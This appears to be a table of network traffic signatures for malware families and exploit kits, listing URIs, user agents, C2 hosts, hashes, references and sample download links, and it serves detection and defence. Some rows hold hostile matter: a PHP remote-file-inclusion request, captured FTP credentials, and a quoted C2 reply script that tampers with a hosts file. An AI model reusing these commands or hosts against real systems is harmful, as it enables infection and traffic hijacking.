row | added | type | family | method | uri | path2 | header | ua | port | notes | md5s | ref_url | dl_sample | dl_pcap | strings | analysis_date | Credit |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2 | 2015-01-22 | CRIME | Carberp / Glupteba | GET | <p>/get_ads.php?yy=1&aid=2&atr=exts&src=199 <p>/go/p1011105.subexts <p>/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1 <p>/javascript/live_cd/popunder_script-1400195675.js <p>/images/ffadult/css/header.css <p>/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css | <p>/get_ads.php?yy=1&aid <p>/go/ <p>/live_cd/ <p>/ffadult/ | 80 | 85acec48c593832bdd57f90aec783a28 | http://malware-traffic-analysis.net/2014/12/25/index.html | ||||||||
3 | 2015-01-22 | CRIME | Fiesta EK | GET | <p>/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G &QPy3i=J4HP58S7h&dRPS8=7bi7Y <p>/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c <p>/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR <p>/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5 <p>/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2 | /? | 80 | http://malware-traffic-analysis.net/2014/12/26/index.html | |||||||||
4 | 2015-01-22 | CRIME | Fiesta EK | GET | <p>/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9 <p>/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94 <p>/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54 | /ai_qkvu2/ | 80 | http://malware-traffic-analysis.net/2014/12/17/index.html | |||||||||
5 | 2015-01-22 | CRIME | Gongdad / Gong Da compromised site redirects | GET | <p>/pg/kcp/index.html <p>/popup/index.html <p>/my/by4.html | <p> is to create a new line break in the Web version of the table - Replace with Domain/IP | http://malware-traffic-analysis.net/2014/12/13/index.html | ||||||||||
6 | 2015-01-22 | CRIME | Gongdad / Gong Da EK | GET | <p>/data/file/cr/index.html <p>/data/file/cr/swfobject.js <p>/data/file/cr/jquery-1.4.2.min.js <p>/data/file/cr/main.html <p>/data/file/cr/AyVpSf.jar <p>/data/file/cr/com.class <p>/data/file/cr/edu.class <p>/data/file/cr/net.class <p>/data/file/cr/org.class /windos.exe | /data/file/cr/ | <p> is to create a new line break in the Web version of the table - Replace with Domain/IP | http://malware-traffic-analysis.net/2014/12/13/index.html | |||||||||
7 | 2015-01-22 | CRIME | Dalexis Loader | GET | <p>/tmp/pack.tar.gz <p>/assets/pack.tar.gz <p>/piwigotest/pack.tar.gz <p>/histoiredesarts/pack.tar.gz <p>/fit/pack.tar.gz | /pack.tar.gz | 80 | http://blog.malcovery.com/blog/ctb-locker-the-newest-crypto-malware-now-via-spam | |||||||||
8 | 2015-01-22 | APT | Gholee / Rocket Kitten | GET / POST | <p>/index.php?c=Ud7atknq&r=17117d <p>/index.php?c=Ud7atknq&r=1710b2 | /index.php?c= | 80 | http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html | |||||||||
9 | 2015-01-22 | CRIME | Zemot | GET | /b/shoe | /b/shoe | 80 | http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html | http://bit.ly/aptsamples | ||||||||
10 | 2015-01-22 | CRIME | Zemot DL via Asprox | GET | /catalog/159 | /catalog/159 | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | http://bit.ly/crimesamples | ||||||||
11 | 2015-01-22 | CRIME | Zemot downloading Rovnix | GET | /mod_jshopping_products_gdle/mod_smartslider2/ | /mod_smartslider2/ | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | http://bit.ly/crimesamples | ||||||||
12 | 2015-01-22 | CRIME | Zemot downloading Rerdom | GET | /mod_jshoppi/soft32.dl | /soft32.dl | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | http://bit.ly/crimesamples | ||||||||
13 | 2015-01-22 | CRIME | Rerdom | GET | /b/eve/<redacted> | /b/eve/ | 8080 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | http://bit.ly/crimesamples | ||||||||
14 | 2015-01-22 | CRIME | Clickfraud | GET | /b/req/<redacted> | /b/req/ | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | |||||||||
15 | 2015-01-22 | CRIME | Cidox / Rerdom / Clickfraud | GET | <p>/b/eve/e91425775cc5d7e657bd2cc7 <p>/b/letr/21D84379F768D95442B92BC5 <p>/b/opt/E1805AD5D79824076249D696 <p>/b/req/FDD953BA382388758DF27AE4 <p>/b/pkg/<redacted> | <p>/b/eve/ <p>/b/letr/ <p>/b/opt/ <p>/b/req/ <p>/b/pkg/ | 80 | http://www.malware-traffic-analysis.net/2014/07/21/index.html | |||||||||
16 | 2015-01-22 | CRIME | Cidox / Rerdom / Clickfraud - clickurl GET | GET | /x/48petqwk9/<redacted>/AA/0 | /x/48petqwk9/ | 80 | https://www.damballa.com/wp-content/uploads/2014/11/Behind_Malware_Infection_Chain_Rerdom.pdf | |||||||||
17 | 2015-01-22 | CRIME | Cidox / Rerdom / Clickfraud - clickurl GET | GET | /2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com | referrer http://controller-best.com | 80 | ||||||||||
18 | 2015-01-22 | APT / CRIME | Scieron / Httneilc / HTClient | packet data <p>0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82 <p>0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38 <p>0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04 <p>0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13 <p>0040 00 12 00 63 01 00 | 8081 | <p>http://www.symantec.com/security_response/writeup.jsp?docid=2014-072320-5920-99 <p>http://www.symantec.com/connect/blogs/scarab-attackers-took-aim-select-russian-targets-2012 | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | |||||||||
19 | 2015-01-22 | CRIME | Zollard RFI | POST | /cgi-bin/php? %2D%64+%...<long string removed php encoded>...%2D%6E | /cgi-bin/php? | Host: <target server> User-Agent: Mozilla/5.0 (compatible; Zollard; Linux) Content-Type: application/x-www-form-urlencoded Content-Length: 1825 Connection: close | Mozilla/5.0 (compatible; Zollard; Linux) | 80 | ||||||||
20 | 2015-01-21 | CRIME | Upatre | GET | <p>/js/jquery-1.41.15.js <p>/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js <p>/js/jquery-1.41.15.js?get_message=3290013886 | /js/jquery-1.41.15.js | 80 | <p> is to create a new line break in the Web version of the table - Replace with Domain/IP | a752bedbbf6b73e52e2d7f8f3cd6a227 <p> 2c7810794a5027ddfc0568808dea3437 | http://malware-traffic-analysis.net/2015/01/21/index.html | http://malware-traffic-analysis.net/2015/01/20/index2.html | ||||||
21 | 2015-01-21 | CRIME | Cryptowall 3.0 | POST | <p>http://proxy1-1-1.i2p/fee4roy2hih9 <p>http://payto4gtpn5czl2.torforall.com/ofs20c | i2p torforall.com/ofs20c | 80 | e67edfaa0d65e822fe41bf978ccd9c3c | https://isc.sans.edu/diary/Traffic+Patterns+For+CryptoWall+30/19203 | https://malwr.com/analysis/MDA0MjIzOGFiMzVkNGEzZjg3NzdlNDAxMDljMDQyYWQ/ | |||||||
22 | 2015-01-21 | CRIME | Andromeda | POST | /ldr.php | /ldr.php | Accept: text/html, application/xhtml+xml, */*::~~Content-Type: application/x-www-form-urlencoded::~~Accept-Language: en-US:: ~~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | 80 | ||||||||
23 | 2015-01-21 | CRIME | Angler EK Chain | GET | /t19jl0hvv2.php | 80 | |||||||||||
24 | 2015-01-21 | CRIME | Angler EK Chain | GET | /752s2n0ndw.php | 80 | |||||||||||
25 | 2015-01-21 | CRIME | Angler EK Chain | GET | /erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp | 80 | |||||||||||
26 | 2015-01-21 | CRIME | Angler EK Chain | GET | /P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN | 80 | |||||||||||
27 | 2015-01-21 | CRIME | Angler EK Chain | GET | /models/runway/ring/header.js | 80 | |||||||||||
28 | 2015-01-21 | CRIME | Angler EK Chain | GET | /code/decrease/revenue/core.js | 80 | |||||||||||
29 | 2015-01-21 | CRIME | Asprox / Kuluoz | GET | /include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak= <p>HTTPS over port 443 as a possible connectivity check | /include.php?t= | 80 | http://malware-traffic-analysis.net/2015/01/02/index.html | |||||||||
30 | 2015-01-21 | CRIME | Asprox / Kuluoz | POST | /index.php | /index.php | 80 | http://malware-traffic-analysis.net/2015/01/02/index.html | |||||||||
31 | 2015-01-21 | CRIME | Chanitor | POST | /gate.php | /gate.php | Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0 | 80 | |||||||||
32 | 2015-01-21 | CRIME | Chanitor Downloads | GET | <p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php <p>/wp-includes/js/tinymce/skins/lightgray/1.php <p>/wp-content/plugins/motopress-content-editor /flexslider/fonts/1.php <p>/wp-includes/js/tinymce/plugins/wpfullscreen/1.php | /1.php | 80 | ||||||||||
33 | 2015-01-21 | CRIME | Cryptowall | POST | <p>/532boskc3i0 <p>/nvebi4m4ggdokz <p>/wbkljtzpimbryt | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 80 | ||||||||||
34 | 2015-01-21 | CRIME | Cryptowall | GET | <p>/wp-content/themes/exiportal/dh5x3a1815j <p>/wp-content/themes/esther/6l7de | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) | 80 | ||||||||||
35 | 2015-01-21 | CRIME | Dridex payload | GET | <p>/mopsi/popsi.php <p>/js/bin.exe | /popsi.php /bin.exe | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E) | 80 | |||||||||
36 | 2015-01-21 | CRIME | Fake AV post compromise | GET | /?0=13&1=1&2=15&3=i&4=7600&5=0&6=1111&7 =kyxnujmwnn | 80 | http://www.malwaresigs.com/2014/02/07/fakeav-is-still-alive/ | ||||||||||
37 | 2015-01-21 | CRIME | Fiesta EK | GET | <p>/txf9p_v8/ye1PlchZ7X9pFcl0o-y3 <p>/txf9p_v8/14dcb5b6b53272fd050d5358500e540100 0750585657520d0400060703005305 ;114402;287 <p>/txf9p_v8/4dc239e53174afbc5d010f0901025302055 75709075b550e01500156520c5406 | /txf9p_v8/ | 80 | http://malware-traffic-analysis.net/2015/01/20/index.html | |||||||||
38 | 2015-01-21 | CRIME | Flashpack EK | GET | /sv62a76d18537/index.php | /index.php | 80 | ||||||||||
39 | 2015-01-21 | CRIME | GameThief | POST | /tj.asp | /tj.asp | 80 | ||||||||||
40 | 2015-01-21 | CRIME | GameThief | GET | /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP& iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack | /count.asp?mac= | 80 | http://malware-traffic-analysis.net/2015/01/03/index.html | |||||||||
41 | 2015-01-21 | CRIME | Gypothy | GET | /bigbight/kinkong.txt | /kinkong.txt | ~~Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)::~~Host: adakaobiri.com::~~Connection: Keep-Alive::~~ | Accept-Language: en-US::~~Accept-Encoding: gzip, deflate::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) | 80 | ||||||||
42 | 2015-01-21 | CRIME | H-W0rm | POST | /SpCoderHere | |pcname|hostname|username .. other pc data | 80 | ||||||||||
43 | 2015-01-21 | CRIME | KaiXin EK | GET | <p>/indexindex/ <p>/indexindex/gg.jpg <p>/indexindex/jquery-1.4.2.min.js <p>/indexindex/swfobject.js <p>/indexindex/main.html <p>/xzz1.exe <p>/indexindex/NlNwQh.jar <p>/indexindex/com.class <p>/indexindex/edu.class <p>/indexindex/net.class <p>/indexindex/org.class | /indexindex/ | 80 | http://malware-traffic-analysis.net/2015/01/03/index.html | |||||||||
44 | 2015-01-21 | CRIME | Kovter | POST | <p>/9/form.php <p>/11/form.php <p>/w1/form.php <p>/1/feed.php | /form.php | Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko Host: b7-golfix.org Content-Length: 368 Cache-Control: no-cache | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MALC; rv:11.0) like Gecko | 80 | ||||||||
45 | 2015-01-21 | CRIME | Nuclear EK | GET / POST | <p>/XhBWV0gBT08OVFVW.html <p>/AwoVGwxQAEcOVRleDlRTBgMFR0tUV1YOVFcAHA JDQUhXVlxUVgdOVRtA <p>/ABsJAkgKUURCGlYaShlWAAACQUJfV1RCGVYEBh 1GRlVLVEJLVgUBT0AONi0fCB0j | 80 | http://malware-traffic-analysis.net/2015/01/18/index2.html | ||||||||||
46 | 2015-01-21 | CRIME | Poweliks | GET | <p>/query?version=1.7&sid=1101&builddate=201214&q= low+testosterone+in+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 <p>/query?version=1.7&sid=1101&builddate=201214&q= fast+weight+loss&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 <p>/query?version=1.7&sid=1101&builddate=201214&q= pain+in+knee+cap&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 <p>/query?version=1.7&sid=1101&builddate=201214&q= anti+aging+cream+for+men&ua= Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; I Trident/5.0)&lang=en-US&wt=0&lr=0&ls=2 | ?version=1.7&sid= ls=2 | Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) | 80 | |||||||||
47 | 2015-01-21 | CRIME | Redirect to Fiesta EK | GET | /?iVXpY9be=J8v3ax4v1&V5=1lM9es5-U2&npv_F-g= aPp8X- 02- GbU&b-nd9=-2-7nwdGa9Y&_6nQ=Y90gT9oPejrdO & m_h=bv_8fzs0m6H&Zg_-tWd=f-bj0I9sai&hfUK=b3 | 80 | http://malware-traffic-analysis.net/2015/01/20/index.html | ||||||||||
48 | 2015-01-21 | CRIME | Sweet Orange EK | GET | <p>/admin4_account/mobile/movies.php?timeline=18 <p>/bad/generic/help.php?state=39 <p>/cnet/tmp/Indy_admin/investor.php?setup=20 <p>/dbadmin/wp-admin/hex/help.php?state=33 <p>/forums/example/screens/investor.php?setup=20 <p>/gcc/tmp/bad/help.php?state=25 <p>/ip/ch/investor.php?setup=20 <p>/profiles/stat/movies.php?timeline=21 | <p>/timeline=18 <p>/state=39 <p>/setup=20 <p>/state=33 <p>/state=25 <p>/timeline=21 <p>/timeline=20 <p>/france=155 <p>/state=31 | |||||||||||
49 | 2015-01-21 | CRIME | Sweet Orange EK | GET | <p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064 <p>/printer.php?cover=1388&catalogp=4&links=423&speeches=171 &about=1836&arts=205&anal=1064&errfix=urepair <p>/printer.php?rates=1764&catalogp=4&pixel=294&speeches=171 &shows=2171&trans=867&misc=1087&urepair=errfix <p>/store.php?back=669&nav_m=75&sendmail=4&stats=1186 &logout=171&state=2215&CRIME=2249 <p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535 <p>/teen.php?corp=2718&what=2210&soma=4&apps=1014 &pipermail=171&intl=783&best=535&repfix=fixutil <p>/teen.php?cpan=2441&soma=4&subs=2093&pipermail=171 &feed=2093&film=663&comp=954 <p>/serial.php?help=805&browsers=4&about=2398&icons=171 &music=247&sony=430&work=2315 | <p>/printer.php <p>/store.php <p>/teen.php <p>/serial.php <p>/fixutil=repfix <p>/repfix=fixutil | 80 | ||||||||||
50 | 2015-01-21 | CRIME | TBD | POST | /store/ | /store/ | 80 | http://malware-traffic-analysis.net/2015/01/20/index2.html | |||||||||
51 | 2015-01-21 | CRIME | TBD Post Flashpack | GET | <p>/r?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ <p>/search?q=wrestling&subid=4699 <p>/click?q=wrestling&subid=4699&link= kkCguKA.EeSIskSKW9RPYQ | /r?q= /search?q= /click?q= | 80 | http://malware-traffic-analysis.net/2015/01/20/index.html | |||||||||
52 | 2015-01-21 | CRIME | TBD Proxy (Htbot?) | GET | <p>/ocfg.php?command=getip <p>/ocfg.php?command=getid <p>/ocfg.php?command=ghl&id=1493496 <p>/ocfg.php?command=dl&id=1493496 <p>/ocfg.php?command=version&id=1493496 <p>/ocfg.php?command=getbackconnect <p>/pointer.php?proxy=<IP>%3A24635&secret=BER5w4evtjszw4MBRW | /ocfg.php?command= | 80 | http://malware-traffic-analysis.net/2015/01/12/index.html | |||||||||
53 | 2015-01-21 | CRIME | Upatre | GET | <p>/1501us22/<PC--NAME>/0/51-SP3/0/ <p>/1501us22/<PC--NAME>/1/0/0/ <p>/2807cw/<PC-Name>/1/0/0/ <p>/2807cw/<PC-Name>/41/5/4/ <p>/2807cw/<PC-Name>/0/51-SP2/0/ <p>/1201uk1/<PC-Nam/0/61/0/ <p>/1201uk1/<PC-Name>/0/51-SP3/0/ <p>/1201uk1/<PC-Name>/1/0/0/ <p>/1201uk1/<PC-Name>/41/7/4/ " <p>/2307stat/<PC-Name>/0/51Service%20Pack%202/0/ <p>/2307stat/<PC-Name>/1/0/0/ <p>/2307stat/<PC-Name>/41/5/4/ | <p>/1201uk1/ <p>/2307stat/ <p>/2807cw/ <p>/1501us22/ | Mozilla/5.0, Host: <IP:port>, Cache-Control: no-cache | 80 | |||||||||
54 | 2015-01-21 | CRIME | Vawtrak / Neverquest | POST | /collection/0000004E/00/9EBD6132 | /collection/ | 80 | http://malware-traffic-analysis.net/2015/01/18/index2.html | http://malware-traffic-analysis.net/2015/01/18/index2.html | ||||||||
55 | 2015-01-21 | CRIME | Zeus | GET | <p>/backup/config.bin <p>/en/images/config.bin <p>/guardnow/config.bin <p>/guardnow/config.bin | /config.bin | Accept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356= | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 80 | ||||||||
56 | 2015-01-21 | CRIME | Zeus | POST | /choosen/helps/file.php | /helps/file.php | Accept: */*::~~User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)::~~Host: 104.192.103.10::~~Content-Length: 128::~~Connection: Keep-Alive::~~Cache-Control: no-cache::~~::~~\030\206-yV\264;\376[\270\021\244(k\353\253\001\206\311\376^\336AGZp\323\342E\324\325\323\333"\342\234\010\214\255\257\363S\343f$\274)\356= | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | 80 | ||||||||
57 | 2015-01-20 | CRIME | AdWare Kraddare.IL | GET | /bv/config.php?q=^/irW@RwOC6RKkFiJgWt_ESwGQKBP... <very long string> ..@RwNPRwNN:: | /config.php?q=^/irW@ | 80 | http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed | |||||||||
58 | 2015-01-20 | CRIME | AdWare Kraddare.IL | POST | /bv/config.php | /config.php | 80 | http://totalhash.com/analysis/4851fcb8933220d2cb1187ab769bf96e3624b2ed | |||||||||
59 | 2015-01-20 | CRIME | Dyre | GET | /2001uk11/HOME/1/0/0/ | /HOME/1/0/0/ | User-Agent: Mozilla/5.0 Host: 202.153.35.133:33384 Cache-Control: no-cache | Mozilla/5.0 | 80 | https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/ | |||||||
60 | 2015-01-20 | CRIME | Dyre | GET | /mandoc/eula012.pdf | /eula012.pdf | Accept: text/*, application/* User-Agent: Mozilla/5.0 Host: clicherfort.com Cache-Control: no-cache | Mozilla/5.0 | 80 | https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/ | |||||||
61 | 2015-01-20 | CRIME | Dyre | GET | /mandoc/ml1from1.tar | /ml1from1.tar | User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 Host: essextwp.org | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36 | https://malwr.com/analysis/NmNmNDYwMzEzMzcxNGViNWE3ZmZhMGQ0MDJmNDQ5NDQ/ | ||||||||
62 | 2015-01-20 | CRIME | Dyre plugin dl | GET | /ineede900.rar | 80 | |||||||||||
63 | 2015-01-20 | CRIME | Kazy | GET | /cmd/api.php?mk=20140708041847777&action= get_availability&partoffer_id=11229&a2=FR | /api.php?mk= | 80 | https://www.virustotal.com/en/file/411e52c674faac375570a8786bf88bd849dbccc4aaa895aa59c6a3c0c568ccac/analysis/ | |||||||||
64 | 2015-01-20 | CRIME | Mudrop | GET | /gcs?alpha=YBvfs8NDNYK3vSEO+ p6fL2KZts4yS8inp2oWpqiDOinE/IJmP6Ktx9+Px+c= | /gcs?alpha= | Host: api.greenerweb.info Cache-Control: no-store,no-cache Pragma: no-cache Connection: Keep-Alive | ||||||||||
65 | 2013-11-12 | CRIME | ChePro (Brazil.banker) | GET | /ini/xvwmmwb.mod | /xvwmmwb.mod | Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: www.aspramece.com.br Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | embedded in RTF | 2A5E5D3C536DA346849750A4B8C8613A (RTF dropper) 6D78F17AC2E4B95A671B079F25DD3B79 (RTF dropper) | http://www.securelist.com/en/blog/208214122/Brazilian_bankers_gone_wild_now_using_malicious_Office_files | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/11/brazilian-bamker-cinternetbankingcpl.html | 11/12/2013 | ||
66 | 2013-10-15 | CRIME | Cryptolocker | POST | /home/ | /home/ | Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: rwyngtbvunfpk.org Content-Length: 192 Connection: Close | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) | crypt_1_sell23-09.exe_ | 9cbb128e8211a7cd00729c159815cb1c | http://nakedsecurity.sophos.com/2013/10/12/destructive-malware-cryptolocker-on-the-loose/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | http://contagioexchange.blogspot.com/2013/10/cryptolocker-strings-CRIME.html | 10/14/2013 | ||
67 | 2013-09-10 | CRIME | Reedum | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] | 220 ProFTPD 1.3.3a Server (Debian) [::ffff:109.234.159.254] USER user37704 331 .................. ............ ...... ........................ user37704 PASS intro22 230 ........................ user37704 .................. TYPE A 200 ...... .................... .. A PORT 10,0,2,15,4,24 500 ........................ .............. PORT LPRT 6,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,4,24 500 LPRT .... .................... | 0ca4f93a848cf01348336a8c6ff22daf | http://www.naked-security.com/malware/Infostealer.Reedum/ | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | 3/1/2013 | |||||||
68 | 2013-09-09 | APT | Vidgrab | POST | (172.16.253.130)|1067|WinXP|D|L|No| 0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|. | ....3 HTTP/1.1 301 Moved Permanently Location:http://windowsupdate.microsoft.com/ Content-Type: text/html Connection: Keep-Alive <h1>Bad Request (Invalid Verb)</h1> .....HK|(172.16.253.130)|1067|WinXP|D|L|No|0..0....1..52..|No|V2010-v24|2184|0|3111947|0|1|. | 660709324acb88ef11f71782af28a1f0 | http://contagiodump.blogspot.com/2013/09/sandbox-miming-cve-2012-0158-in-mhtml.html#more | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/09/vidgrab-strings-apt.html | 9/8/2013 | |||||
69 | 2013-09-08 | APT | Page / stscout / Elise / lStudio / Wumins | GET | /29af9cdc/page_12082223.html | /page_ | Accept: */* Cookie: XX=0; BX=0 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32) Host: gorush.dyndns-web.com Connection: Keep-Alive Cache-Control: no-cache Pragma: no-cache | Mozilla/4.0 (compatible; MSIE 8.0; Win32) | 443 | aaf73666cbd750ed22b80ed836d2b1e4 | http://www.fireeye.com/blog/technical/exploits-vulnerabilities/2012/09/analysis-of-malware-page.html#more | http://bit.ly/aptsamples | http://bit.ly/aptpcaps | http://contagioexchange.blogspot.com/2013/09/page-elise-lstudio-wumins-strings-apt.html | 9/8/2013 | ||
70 | 2013-09-08 | CRIME | Tijcont | GET | /s/blog_b2afd7fe01019tkf.htm | /blog_ | /3.txt Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: 110.34.198.123:888 Connection: Keep-Alive /s/blog_b2afd7fe01019tkf.html User-Agent: getURLDown Host: blog.sina.com.cn /album/w=1600;q=90/sign=862e65d610dfa9ecfd2e521152e0cc72/9358d109b3de9c82a5a5fe456d81800a18d84333.jpg User-Agent: loadMM Host: e.hiphotos.bdimg.com | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) ** User-Agent: getURLDown ** User-Agent: loadMM | 80,6000,8888, | C2 Server reply @echo off echo. del %systemroot%\system32\drivers\etc\hosts.ics echo 67.198.255.93 